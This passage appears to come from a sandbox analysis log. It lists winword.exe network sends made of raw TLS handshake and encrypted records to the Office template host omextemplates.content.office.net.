258. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5<\\xfbz\\xdb\\xe7\\x99\\x8f\\x1e\\xcb\\x1f\\x99c\\xd5\\xbdr\\xba\\xd9c\\xd5n\\xb4\\xc8\\xcb \\xe2\\\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
259.  
260.  
261. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5n\\xe2\\x98\\x1d\\xefh\\xa1n\\x99a\\xe9\\xbc\\x16\\xade+\\x9f\\xf3#-tw\\xf8r8\\xaa\\xb4\\x99\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
262.  
263.  
264. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x9b\\x03~d \\x9e\\x08\\x07\\x1b\\xb9i\\x11\\xed=9\\x8d\\xa3\\x92#d\\x82c\\xe5\\xd5\\xe1\\x1a\\xed\\x1b\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
265.  
266.  
267. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe8 \\xe2\\x8bn^\\x08\\x9c\\xf9\\xcc\\xd5\\xd7\\xc8a\\xcd4\\xa1l\\xf4\\x93\\x9e\\x0bu\\x97c\\x8d\\xd2\\x14\\x11\\xfa\\x08\\xd93to,/\\x02dwp\\xe4\\xe3\\xca\\xcf@?\\x19\\x7f\\x02\\xa3|\\xa0\\xb8\\x08\\xef\\xdf\\xb3\\xd1&\\xa0x$\\x99\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd6\\xce\\xfc\\xbb%\\x95\\xe7\\xed'\\x02\\xc4\\xbcsy\\xddro\\xf1\\xd6\\xd9bl\\x82\\x0c\\xa2\\x91!,\\xc6\\x93#\\x16\\xbeb\\xf1\\xd7i\\x98\\xa8\\xbdd\\xbc=9\\x96gfv"
268.  
269.  
270. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\xdab\\xf3g\\xd8\\xb4\\x92\\xff\\xc7\\x90\\xff\\x84\\\\xcf\\xac\\x17\\x17\\xb9\nsw\\xed>92\\x82\\xfar\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
271.  
272.  
273. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5zu\\xae\\x07\\x9f\\xb5#\\xad\\xf2\\xd1&\\xb0\\x95\\x82\\x10\\xd1(\\xd4=\\x15\\x14`\\x96\\xcf\t\\x8da\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
274.  
275.  
276. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5bt\\xb8nk4gv\\xe7giw\\xc7<\\x83b;1%\\xf1~\\xb8f\\x1a\\x08\\xcf\"\\xe9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
277.  
278.  
279. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x045$\r\\xbal\\xa8\\x8a\\xb2\\xd2\\xce4j\\x11\\xab\\xf3\\xb1\\xfbg\\xb6\\x01\\x86\\xe8\\xa19\\xa8\\xcah7o\\xb9\\x1b\\xa7\\x8e\t\\xa2\\xca\\xdc\\xec\\xfc\\xb7\\xf1x\\xfb\\xdc?h\\x8a\\xc4\\xff\\xe2\\x04\\x18\\xc8\\xc9\\x1b\\x80rx!v-f\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000s\\xb1i\\x9al\\xa0\\xf3\\x7f\\xa3!g0\\xeb\\x96\\x9ej\\x17>ntom\\xeb\\x0c0\\9\\x82\\x83\\xab\\x9a@^$u\\xde\\xc2m\\xacc\\\t\\x15\\xe7t\\xd6m"
280.  
281.  
282. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x0f5\n\\xf2\\x94=\\xfe\\x81ztu\\x07e\\x98/\\x85cp\\xd85\\xc1\\x8b\\xd2a^?\\x91\\xc6@\\xc0|\\x04\\xdd~\\x94\\xbdp\\xe4vu\\xee\\xac\\x13\\xb6^\\x9cn\\x83z\\xcc\\xa0\\xf7\\xd1s\\xe4\\xa4lk\\x88\\x8d\\xf7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0004g\\x93\\x0bb\\xd9\\x8d6\\x84\\x0f\\xc41,ngr\\xd5.\\xa2\\xbf\\xa25\\xb4;\tn\\xb5\\xfc\\xc1\\x04n\\xc2\\xff\\x8b\\x7f\\xb7\\xceb\\x91t\\x1e\\xbb\\x087\\xed\\xcb"
283.  
284.  
285. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x92\\x7f\\x9d\\xfax\\x1b\\xc9-0\\x16l/c \\xc6\\xbav\\xd0\\xc0\\x15\\xe9%\\x029%\\xb63\\xeb\\xd7\r\\xe1\\x92\\x97\\x84d\\xbb1\\x1f0\\xd1\\xa9\\xde<m*iv\\xcc\\x8e\\xf1\\xf7\\x0f\\xead\\xa5\\xc0\\x87\\xdaf\t\\xfe\\xd9xy\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc5\\x1aal\\xd4\\xc9\\xe4\\x98u?\\x02~\\xc4\\xe9\\x03\\xf7\\xc6\\xbf\\xef\\x06gh\\xbf\\x9a\\xbe\\x01\\x81d\\x93\\xfc\\xaa\\xfad0\\xc3\\x19\\xb2s\\x10\\xdbk\\x0fjed\\xef"
286.  
287.  
288. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xde\\xb3\\xed\\xd2h\\x194\\xe33\\x99\\x08jc\\xbf\\xbf\\x822\\xba\\xa1\\x14\\xa7+\\x87\\x1d\\x0fk\\xc2\\xee\\xcf\\xfe\\x9d\\xfb<@tc\\xa3.w\\x1a\\x9d\\xd32\\xfb-z\\xa1\\xec\\x83\\xc3\\xb9\\xc5=\\x83fa!\\x92\\x93\\x07\\xf6\\x90\\x83\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000o.\\xc8\\xe36\\x8di\\xa4;\\xe3\\xd0fl<\\x87!\\xfc\\xfe\\x83\\xbe\\x7f\\x8f9\\xe5\\x05i*e\\x06v\\x91\\x9fe \\xeb\\x9du\\xf0\\x84\\x89\\x8e\\xf6s9yu\\xbd."
289.  
290.  
291. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb1\\x14m\\x91y\\x04\\xb8\\xac\\x9d\\xee\\xd2_\\xaa\\xc4\\x1f\\x07\\x12\\xf5(ik@-\\x03\\xc1\\x14%\\x98\\xb7evnb6<\\xddap\\x1f\\xc0>b\\xeb\\x9a\\xbf\\x18vgb\\x97\\xd1\\xb77`\\x99\\xce_\\xef\\xcbq\\xc9\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000#\\xa3sk*\\x80(s\\x8d\\x19p\\xac3`bcn0\\x12\\x86\\x06\\xcf\\xd3\\xd1-e\\xd1k\\x9b\\xae\\xe4\\xe8&c\\\\x99x\\xed\\xb8\\x0e\\x07\\xbap@\\xae\\xda\\xab\\xf6"
292.  
293.  
294. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04i'\\xaf\\x1c\\x85\\xb5\\xe61\\x8b7>\\xa9ov\\xd1b\\x16\\xcb\\xfdc\\xf6\\xe5\\x98\\xcb\\xdd3~\\x7f\\xbb\\xe0\\xfc8\\xe65\\x81y\\xd1cfz\\x046\\x8c\\xba\\x1f\\xfc+\\x9d\\xb29\\xc0\\xfa\\xb4s\\xf9\\xd5`\\xb3z\\xbad%\\xb9\\x16\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xea\\xd8\n\\xf9\\xc1\\x12\\xcaoz\\xf7\"\\xf4s\r\\\\x88hk\\x15t\\x0bm?f\\x899+\\xc7\\x08\\xd7$\\x8e5\\xe0\\x11\\xbb\\xfbsg\\xe3h\\xd1w\\xb5\\xc3\\xc7\\xf3\\x8d"
295.  
296.  
297. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x95\\x1c\\x8d=%\\xf4\\x91\\xc1g\\x17\\xfc\\xd4\\xae\\xf1\\x9b\\xac\\xcc\rv\\xdd\\xce\\xf1xszs\\x0e\\xca\\x14s\\x7f\\xdb\\xc40w\\xf5\\xa2yn\\xbe)\\x95\\xfe\\xfbi\\xc9\\xd3\t\\xd9\\x8d\\x1ex\\xf6\\xa5\\x1dj\\x08\\xdfv~\\x1f&l\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x06\\x9f\\xe3\\x81y\\x0b\\xa1\\xac\\xf7\\xfb\\xd4\\xc5 \\x88/l\\xb7\\xe5%\\x87\\xaf\\x955\\xb2y\\x08\\x10\\xd1\\x85\\x0e\\xfe\\x0e\\x17k,\\x8b\\xe0\\x1a\\xe7\\xa5k1\\xdc\\xb2&-d9"
298.  
299.  
300. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x8f\\x99\\x87gt~-\\x8ew\\xfe\\x93\t\\xf4\\x8b-\\xc7\\xe2\\x98u\\xb0\\x19\\xba\\x12\\xb2c\\x83\\xa74\\xbbu\\xa4\\x1e\\x13\\xe7u\\xe1\\x9bflu%\\xa2i4\\xed\\xae\\xfd\\xfa\\xe1\\xb3\\xc2\\x17\\xff\\xa3,d\\xc5w\\x95\\xcb\\xa9e\\xec\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe7,6\\xc8`\\xa9\\xda\\x008\\x12\\xabp\\x0e\\xac\\xfc\\xef\\x92\\x03j\\xd8\\x18\\x89\\xaf\\xbe\\x93\\x87\\xcf\\x8b\\xd6ab\\x92\\xa0\\x9br\\xba\\xe8\\x9e \\x88\\xec\\x88\\x12\\xb3\\x17k@"
301.  
302.  
303. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04l=eav>\\x01\\x17\\xee:\\xe3\\xd8\\x1e\\x88\\xc4\\xf7h\\x8e\\xb9\\x1f~m\\xd9\\xb87\\xa8h\\x10f^g\\xe5\\xbc6ixc\\xff\\xe4yu\\xfb\\xbc\\xbf8\\x066\\xca\\x815\\x85\\xda\\x04\\x95\\x9f\\x00\\xbb\\x8a_\\x19\\xef\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc7\\x97\\xb10\\xc3\\xfb%\\xba\\xfe\\xdfs\\x06\\x03\\x95\\x9b\\xbf\\x02>\\x0f\\x9b\\x1c\\xbc\\x9f!\\xf91\\xb6:2\\xe8br0\\xaf\\x94z_,\\xcb\\xbf^\\x8d\\xd7\\x1d\\xb6\\xf5\\x0f8"
304.  
305.  
306. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xda\\x1b\\x1ft\\xff\\xae\\x0eb\\x07de!\\xb5mx\\xc3\\x9e4#`\\xf2\\xc6\\xd2.s\\xeb\\x95\\xa8\\xb2\\xde>o\\x9c\\x9d\\xb9\\xee\\xe4\\xd0\\xde\\xae\\xe9\\xad\\xc7`\\x99q\\xfb\\xd4\"\\xb1-\\x8f\t\\x8b\\xc0\\xa3\\xa2\\xb2\\xb3\\x02\\xd33p\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb1u\\xd5\\xd7z\\xea,\\x1c\\xb2_l\\x0c\\x1bl1\\xb4\\x90\\x9d\\xa7\"\\xd5p\t19\\xa7\\xeee-21ci>k\\xeb\\xc4-\\xf54\\xdc%g\\xdc\\x0c\\xa7\\xc5 "
307.  
308.  
309. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04+\\xe9\\xdc\\x88i\\xad\\xcb$&f\\xda9\\xae\\x1c\\x7f\\x8c\\xf5\\xce\\x15\\x95\\xcd\\xd9\\x01\\xe3\\xac\\xc0\\xcfn\\xdf\\xd5\\xcez\\xe5\\xb1\\x1f\\xe0=\\x1ce\\x0c\\xf15\\x93\\x06\\xd6\\xca\\x13\\x18\\xbe\\x8dw48\\x17wt\\xff\\x16t\\xac\\x01\\x11s\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000m\\x945\\x8e\\xd1p\\xc0`\\xb4\\x86u\\xf0s\\xd1\\xb3\\xfeo\\xe2\\xff7\\xe8?_*\\xb3\\x0b\\xae\\x882\\x0c\\xdcf\\xa09\\x97\\xf4xf\\xf6\n\\x86\\xc97\\xec\\x10\\xe9\\x9a"
310.  
311.  
312. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa4\\xc6\\x8e\\xe5r^\\x19\\xabl\\xea\\x14k\\xf5ohx`\\xffj\\x15\\xef\\xef\\xbbk \\xd4\\x9d\\x17\\xb5~\\xd1\\x80\\xf9\\x12r\\xa2\\xbat\\x1f\\x11\\xeep\\xba\\xea~&x\\x81\\x10\\x8ep\\x8c\\x9e\\xd7\\\\xba&\\x9fv9\t\\xbe\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xcb/r\\xfd\\xf2\\x81\\xa7\\x13f\\xd3\\xfc\\xf7\\xf2c\\xd7\\x99\\xca\\x07b\\xb6\\xc9\\xa9\\xea3\\xde\\xaf\\x1f\\x0e\\x96\\x9c7\\xd5- \\xa7\\xcf\\xc3\\xb9\\\\xb5\\xf4\\x00^\\x8c/\\xaf\\xcf"
313.  
314.  
315. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe1\\x04x\\xbb\\xa9\\xea>\\x88\\xb9\\x87\\x0b\\xca\\xb866\\x8e\\x88`\\x11=|\\xa5\\xe4\\x11\\xd5\\xe6\\x94\\xf0\\x02h\\xf8\\x00\\xb8x\\xd2\\xc8p\\xdf\\xc4'\\xab\\x8c\\xd0#x\\x96\\x1d\\xae\\xfe\\xcd\\xc9y\\xea\\xa03o \\xb8\\xa7\\xa0\\xc1\\xe6h\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf0v\\x16\\xa5\\xb2ux'\\xbc\\xb4c\\xc2c\\xca\\xbc\\xf7\\xcd\\x822\\xd0,\\x8ds\\x12@\\xad\\xff\\xf1\\xb1\\xe0\\xfc\\x12v\\xb9.\\xc2\\xa4md\\xcc\\x15f\\x13\\x9d\\x02\\xe2\\xdc\\x89"
316.  
317.  
318. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xeb\\x8d_c\\x1e\\x87\\xadk:\\x8f\\x95\\x92\\xc7\\xe2\\xdc\\x83\\xff@q\\xb5\\xe9\\x92bz\\xcduz\\xbc\r\\x9d\\x8e\\xb0c\\xd2\\xb3\\xcf\\x7f1\\x18|\\xc8\\x16\\x05\\x15u\\xdf\\xfa\\x15l\\x07vx\\x15\\x16q\\xed!\\xdd\\xdf\\xb3ku\\x8c\\x12\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\t0&4d\\x99\\x01\\xcc\\xe4\\xbc\\xea\\xdb\\xaf\\xf3\\xe58\\x97w\\x89\\xc2\\xdd\\xce\\xb7f\\x8f\\xbec\\xe3\\xf5kun\\x1a\\xd2\\xb0f\\xca\\xfbe\\xb4\\xb5q\\x18u\\xa0\\x1d\\x14"
319.  
320.  
321. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x959\\xc3\\xf73;\\x14>\\xab\\xafrm\\xca\\xa2\\xc5\\x9e\\xf8\\x14\\xd8\\xfe\\x89nh\\xe5:fpg\\x9c\\x11\\xcf\\x84\\xee\\x08\\x1e:\\xb6\\xc0\\x87\\xd8\\xdf\\x80\\xbd\\x80ez\\xb6au\\xba\\x80\\x1b\\xfe\\xd1\\xb9\\x88d\\x9b\\xdd\\xd3\\xc8\\x1d\\xe4\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0008\\x0fh\\xeb\\x88\\xd8\\x17fknp\\x862\\x14%\\xe6k\\xeah\\xf4\\x07\\xb6.i\\x8cov\\xc4\\xaf\\x95z\\xc6\\x9cf\\xbb\\xf3\\x81\\x18.\\xea\\x0c\\x15,\\x96\\x90\\x00"
322.  
323.  
324. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xdd$\\x8c\\x84\\xb6\\x12\\xc1\\xff\\xba\\x9f\\xef\\xf3\\xber\\x93s5\\xa8\\xd6/\\xf5\\x8a\\xf9\\xe4c\\xd9\\x89\\xf7'\\xca\\x08z\\xa3\\2xi\\xa6\\xb6\\x18)%\\xd590\\xac\\xb5\\xa1\\xac\\xbf\\xbda\\xb4i\\x83(\\xaf\\x95\\xd0\\xfc\\x16!\\x0c.\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa5\\xfc;,\\xfc0\\xbb+i\\xad\\x8a\\xf5\\xa7fa\\x16\\xa5\\x0b\\xc1\\xe0\\xf89\\xda\\xe8\\xb1\\xc4e\\xa19\\xa5\\x99\nv\\x80\\xcc\\x02,\\x89_ii\\xfe\\xb0g#\\x89i\\x11"
325.  
326.  
327. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04gh\\xd2\\x8c\\xd2\\x07\\x8c\\x84\\xa7\\xc8\\xf9\\xc1\\x87s\\x94\\xa1\\x97r\\xb2\\xb4g\\xf2\\xa4\\xd2f\\xee\\xff\\xefm\\xd2pv\\xc4x\\xe8\\xca\\xd0\\xa2\\xab\\xa5<\\xc9vf\\xee~\\xc1\\xd0\n\\xe6\\x19\\x9c\\xc4\\x85\\xd09x%\\x95\\xd5\\x93\\xc6\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\r\\x15\\x02d\\x97\\x81h\\xaa\\xd5<a9\\x85\\xcc\\xb7\\xbad\\x04\\xf0>\\xbb\\xce\\xf3vtde\\xec\\xcb;b\\xd0\\xccf\\xbb~&\\xd8\\x94\\x15\\xa1~e\\xdb\r"
328.  
329.  
330. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc9\n\\xb4<'\\xb3\\xd3m\\xe6l\\x15\\xcc\tws\\x84\\xae\\xe1\\xf9\\x8c\\xe3\\x918\\xe3)u\\xc5:\\xc3\\x9eu\\xaf\\xd9a\\x00|a_\\x07\\xa07i\\xbf\\x83!\\xdb\\xb1eoc|\\xf4\\xae\\xc0e\\x96\\xfd\\xa2\\xec1\\xfc\\xc9g\\xa0\\xd3c\\xef\\xe3c\\\\xfa\\xcb|e\\x9b\\xc0o0r\\xe9\\xcf\\x9c\\xa0\\xa5\\x13`\\xc9\\xf9\\x81\\x01f\\x0bq-\\x99\\xc1t\\xdb\\xc6\\xafk\\xfb@)\\xcf\\xf8\\xa7/\\xdf\\x158\\xe4\\x1f\\x9f\\xb1\\xf7\\x92\\x95,\\xbb\\x89\\x183\\xa4mkt\\xa8s\\x90d7b\n\\xa1\\xb5\\xa4\\xc2>\\x9b\\xb2\\x93\\x96\\xae\\x11r\\xe0y/\\xbb\\x84\\xea@\\x8ch\\xbb\\xc7\\xf7<n\\xd7r\\x9213\\x02\\x83*\\xdb\\xfa\\xc5\\x87y\\xfbo\\xf8\\xea9\\x1a\\xef\\x8ai\\xbef\\x14\\x98\\xf1\\x11\\xc6\\xf3q\\x93'\\xc6\\x8e\\xaf\\xc3\\xc0\\x1fs\\xe7\\xfa\\x855\\xa4k\\x16j\\x8c\\x8e\\xbc^\\xd9\\xddo\\xa3o\\xa9\\xbbzp!p\\xa8z\\x04\\xe6\\xcbz\\x01r\\xdc\\xc6\\x1e\\xed\\x08\\xd9\\xfd\\x0f\\xf0\\xe1\\xc10?\\xc8//>"
331.  
332.  
333. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x15\r\\x1f\\xa0\\xcd\\x10)\\xe5\\x8c\\xd9j\\x1a\\x97\\x80e\\xb8\\xd3y.\\xe4\\x8a\\x17\\\\x1e\\x80:/\\xc7\\xb6\\x82\\xcda\\xf3.*u\\xceutf\\xdbg\\xd9\\x93\t\\xad\\xc4v\\xa0\\x0b\\xce\\xe5\\xee\\x80\\xc4u\\x19_*\\x1f\\x88\\xd5h\\xd7t\\xbb61\\xe1dl~\t,<\\xba\\xc4q 3\\xe7\\x0c\\x9f\\xf90\\xc2#'\\x18\\x8d\\xccn\\x90\\xa9\\xac\\xb41\\x95\\xfd\\xf3\\xd7\\x0c\\x9d\\x87\\xe9`\\x91v!\\x86\\x90\\xd3\\x19&u\\xc0s\\xc2\\x97\\xa4c\\xcfl\\x93\\xb3\\xcb\\x89\\xdc\\xe7\n\\x15\\xbc\\x0fp\\xbb\\xeb\\xdc\\xcd\\xb1s\\x86\\xf5\\xa1\\xf78\\x85\\xf3m\\x19\\x87\\xaa\\xc7\\xdcn\\x15\\xd1\\xf7\\x81\\xf2(\\x82\\xb8\\xbbs\\x8f\\xe9noba\\x82\\xca\\xeb\\xc5%\\x03\\xbc_\\xf2i)\\xe3\\x01\\x1a\\xb7a\\xbdp\\xef\\x99\\x89`*\\x03\\xe1\\x861\\x14\\xb8j\\xc6\\x17\\xd1?m>\\xc0\\xd0v\\xf1\\xcc\\xb3\\xf27\\xf3\\xd0u\\x06\\xfcr ej!\\xf2y\\x14v\\x18\\xf3\\xee\\xa2>%m\\xb7d\\xdd\\x15\\\\x19\\xd7\\xc9\\xc3_"
334.  
335.  
336. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\\\xe6zg\\xfez\\xdb\\xc3\\x05>c\\xfe\\x0e\\xd9g\\xe2*\\xdf8\\xcb\\xc5*l3\\xe1\\x1f\\x8e\\xfd\\xd4g\\x96\\xa4q*\\x84\\x92\\x82\\x1c4\\xc5\\xe4\\xf5\\x8d(\\xd6\\xcer\\x9d\\xdc1i\\xc9\\x9dhjx\\xa8\\xad;w\\xf0u\\xad\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x12\\xa0p\\xb3u\\xd4\\x98\nvp|\\x99a=^\\xce\\x84\\x98\\xd1\\xa5\\xb4\\xf8v,%\\x1b\\xa3g\\xb0\\xc7\\x1de\\xf9\\xd8\\xd3q\\x87\\xa2\n\\xe4\\x8d\tjg\\xb7!d"
337.  
338.  
339. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5b\\x12@\\x91g\\x04\\x0b\\xb4p\\xe6b\\x1c:\\xca\\xcf(\\xcc\\xc4dl\\xbd>\\x10\\xf6\\xa7?x\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
340.  
341.  
342. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc8\\x15\\x03\\xa2\\xdb\\xd1\\x02\\xaaq\\xa4^\\xe8v\\x89b\\xces\\xed\\x05\\\\xb4z\\xf5y\\xdb\\x0f#d+kg\\xcb\\x01i\\xe0\\xd2\\xaf\t\\xc2b\\x98\\xe9\\x18\\xb4h\\xc03z\\x94\\xd0\\xd0fx<\\xda\\x05\\x0e\\xdc\\x03c\\xb8j:\\x80=\\x08\\x11s\\xd6\\xca\\xe3\\xc5\\x82\\x02\\x83\\xb4g\\x10\\xbc\\xe6\\xa5~\\x98\\xfer\\xf5|\\xff5\\xca\\x0b2\\xcf\\xf0\\xa3\\xe5k\\xe7\\xf6\\x04\\xd5\\xe4\\x01\\xcd\\x8d0\\x1f@\\xd6rs\\x92\\x1a\\xfcc\\xe4z\\xa3\\xf9o\\xf3/\\x96p$\\x00\\x1es\\xc7\\xd4\\x1at\\xeb\\xe9\\xe8\\xe1\\xcfq\\x1e\\xbdi\\x0e\\xa1\\x91\\x8c\\x90x2\\xcf\\xdcs\\xf9\\x15\\xa5l?i\\xf1\\xdd'f\\x87^\\xfb\\xeb\\xdem\\xd68\\xaar\\xa7f\\x01\\x9d$\\xa8\\x92\\xf9\\xdd\\xaedh\\x9d/\\x8b\\xbd3\\xca\\x07^\\x8b<cl\\xe4\\xcc)\\x1du\\xca>\\xbd6\\x96d\\xd1d\r\\xd6y&\\x7fl\\xab\\xda\t\\x9c\\x9c\\x191\\xb8\\xc9\\xa8_<\\xfd\\xfe\\xae#\\xfb\\xd3,6h\\xe1\r\\xea\\xbcj\\x03\\xf5\\xb0\\xb5\\x83>+f\\xb0"
343.  
344.  
345. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb5\\x1a>\\xbbl\\x19\\xc8\\xee\\x0e!\\xcd\\xf5\\xe2\\xc0\\x98\\x1e\\xff\\xb6\\xff\\x80\nk\\x85\ncj\\x8f>\\xc8y\\x86\\x9db\n\\xee-\\x885\\xc9\\xb0xw\\x8aw~!\\x16\\x89\\xed\\xf32\\x8e\\xae\\xa3a\\xeb\\x17h\\xbc\t\\x02\\x19 \\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xb4\\xde,d\r\\xd53i\\x08\\x9fe\\xb8\\xe1!\\xb9\\xbf\\xd1\\xe3\\xb5\\x8e|\\xcfb\\xb6o0\\xc0\\x10;\\x9dy\\xd4\\xc7\\x9b\\x0fu\\x141\\x1fa\\x17\\x1a\\x11\\x1cj\\xed?\\x9f"
346.  
347.  
